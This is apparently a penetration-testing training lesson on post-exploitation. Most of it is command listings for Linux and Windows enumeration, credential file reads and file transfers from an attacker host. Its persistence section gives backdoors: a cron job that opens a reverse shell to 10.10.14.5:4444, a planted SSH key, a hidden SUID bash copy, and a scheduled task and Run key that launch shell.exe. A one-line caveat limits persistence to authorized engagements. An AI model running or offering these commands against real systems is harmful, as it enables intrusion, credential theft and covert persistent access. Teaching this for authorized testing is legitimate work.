Post-Exploitation Fundamentals

intermediate30 minWriteup

What to do after gaining initial access

Learning Objectives

  • Establish persistence
  • Gather system information
  • Find sensitive data
  • Identify lateral movement paths

You got a shell - now what? Post-exploitation is everything that happens after initial access. This includes enumeration, privilege escalation, persistence, lateral movement, and achieving your objectives.

Getting initial access is just the beginning. The real work starts in post-exploitation - understanding the environment, escalating privileges, and moving through the network.

Situational Awareness

bash
1606070;"># Who am I?
2whoami
3id
4groups
5 
6606070;"># Where am I?
7hostname
8pwd
9uname -a
10 
11606070;"># What system is this?
12cat /etc/os-release
13cat /etc/issue
14lsb_release -a
15 
16606070;"># Who else is here?
17who
18w
19last
20 
21606070;"># What can I run?
22sudo -l
23 
24606070;"># Network info
25ip a
26ifconfig
27route
28netstat -tulpn
29ss -tulpn
30 
31606070;"># What processes are running?
32ps aux
33ps aux | grep root

Linux Enumeration

bash
1606070;"># Find sensitive files
2find / -name 606070;">#a5d6ff;">"*.txt" 2>/dev/null
3find / -name 606070;">#a5d6ff;">"*.conf" 2>/dev/null
4find / -name 606070;">#a5d6ff;">"id_rsa" 2>/dev/null
5find / -name 606070;">#a5d6ff;">".bash_history" 2>/dev/null
6 
7606070;"># Check for SUID binaries
8find / -perm -4000 2>/dev/null
9 
10606070;"># Check cron jobs
11cat /etc/crontab
12ls -la /etc/cron.*/
13crontab -l
14 
15606070;"># Check sudo
16sudo -l
17cat /etc/sudoers 2>/dev/null
18 
19606070;"># Interesting files
20cat /etc/passwd
21cat /etc/shadow 2>/dev/null
22cat ~/.bash_history
23cat ~/.ssh/id_rsa 2>/dev/null
24 
25606070;"># Automated enumeration
26606070;"># LinPEAS
27curl -L https:606070;">//github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
28 
29606070;"># LinEnum
30./LinEnum.sh -t

Windows Enumeration

batch
1REM Who am I?
2whoami
3whoami /priv
4whoami /groups
5 
6REM System info
7hostname
8systeminfo
9systeminfo | findstr /B /C:606070;">#a5d6ff;">"OS Name" /C:"OS Version"
10 
11REM Network
12ipconfig /all
13netstat -ano
14route print
15 
16REM Users
17net users
18net localgroup administrators
19 
20REM Running services
21tasklist /SVC
22wmic service get name,displayname,pathname,startmode
23 
24REM Scheduled tasks
25schtasks /query /fo LIST /v
26 
27REM Check for stored credentials
28cmdkey /list
29 
30REM Automated enumeration
31.winPEAS.exe
32.PowerUp.ps1

File Transfers

bash
1606070;"># Linux - Download files
2 
3606070;"># Python HTTP server (on your machine)
4python3 -m http.server 80
5 
6606070;"># wget (on target)
7wget http:606070;">//10.10.14.5/linpeas.sh
8 
9606070;"># curl
10curl http:606070;">//10.10.14.5/linpeas.sh -o linpeas.sh
11 
12606070;"># Netcat
13nc -lvnp 4444 < file.txt    606070;"># Sender
14nc 10.10.10.10 4444 > file.txt  606070;"># Receiver
15 
16606070;"># Windows - Download files
17 
18606070;"># PowerShell
19Invoke-WebRequest -Uri http:606070;">//10.10.14.5/winpeas.exe -OutFile winpeas.exe
20(New-Object Net.WebClient).DownloadFile(606070;">#a5d6ff;">'http://10.10.14.5/nc.exe','nc.exe')
21 
22606070;"># Certutil
23certutil -urlcache -split -f http:606070;">//10.10.14.5/shell.exe shell.exe
24 
25606070;"># SMB (impacket on your machine)
26impacket-smbserver share $(pwd) -smb2support
27606070;"># On Windows:
28copy \\10.10.14.5\share\file.exe .

Basic Persistence

bash
1606070;"># SSH key backdoor
2606070;"># Generate on attacker:
3ssh-keygen -t rsa
4606070;"># Add to target:
5echo 606070;">#a5d6ff;">"your_public_key" >> ~/.ssh/authorized_keys
6chmod 600 ~/.ssh/authorized_keys
7 
8606070;"># Cron backdoor (Linux)
9echo 606070;">#a5d6ff;">"* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'" | crontab -
10 
11606070;"># SUID backdoor (as root)
12cp /bin/bash /tmp/.backdoor
13chmod u+s /tmp/.backdoor
14606070;"># To use: /tmp/.backdoor -p
15 
16606070;"># Windows - Scheduled task
17schtasks /create /sc minute /mo 1 /tn 606070;">#a5d6ff;">"Backup" /tr "C:\shell.exe"
18 
19606070;"># Windows - Registry run key
20reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d 606070;">#a5d6ff;">"C:\shell.exe"
Persistence should only be used in authorized engagements. Always document what you add and clean up after yourself!

Knowledge Check

Quick Quiz
Question 1 of 1

What is the first thing to do after getting a shell?

Key Takeaways

  • First: situational awareness - who, where, what system
  • Enumerate systematically - users, processes, network, files
  • Know multiple file transfer methods - some will be blocked
  • Document everything for your report
  • Persistence requires cleanup - always remove your artifacts